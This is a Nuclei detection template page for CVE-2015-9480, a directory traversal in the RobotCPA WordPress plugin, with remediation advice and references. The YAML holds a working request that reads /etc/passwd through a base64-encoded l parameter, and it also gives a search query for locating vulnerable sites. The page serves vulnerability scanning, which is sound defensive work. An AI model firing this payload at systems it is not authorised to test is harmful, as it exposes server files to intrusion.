WordPress RobotCPA 5 - Directory Traversal
ID: CVE-2015-9480
Severity: high
Author: daffainfo
Tags: cve2015,cve,wp-plugin,lfi,edb,wordpress,robot-cpa
Description
Section titled “Description”The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter.
YAML Source
Section titled “YAML Source”id: CVE-2015-9480
info: name: WordPress RobotCPA 5 - Directory Traversal author: daffainfo severity: high description: The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter. impact: | An attacker can access sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation. remediation: | Update to the latest version of the WordPress RobotCPA 5 plugin to fix the directory traversal vulnerability. reference: - https://www.exploit-db.com/exploits/37252 - https://nvd.nist.gov/vuln/detail/CVE-2015-9480 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-9480 cwe-id: CWE-22 epss-score: 0.35852 epss-percentile: 0.97147 cpe: cpe:2.3:a:robot-cpa:robotcpa:5:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: robot-cpa product: robotcpa framework: wordpress google-query: inurl:"/wp-content/plugins/robotcpa" tags: cve2015,cve,wp-plugin,lfi,edb,wordpress,robot-cpa
http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk"
matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4a0a0047304502206f76aa3d470eaf44f0c861faa0c0c68ce6429b968638a325bea2734c58324ae6022100c65fbab50bd28b0f04cdf17e76d00eb7c96f31372642afba9363ebdbb9e472f6:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-9480.yaml"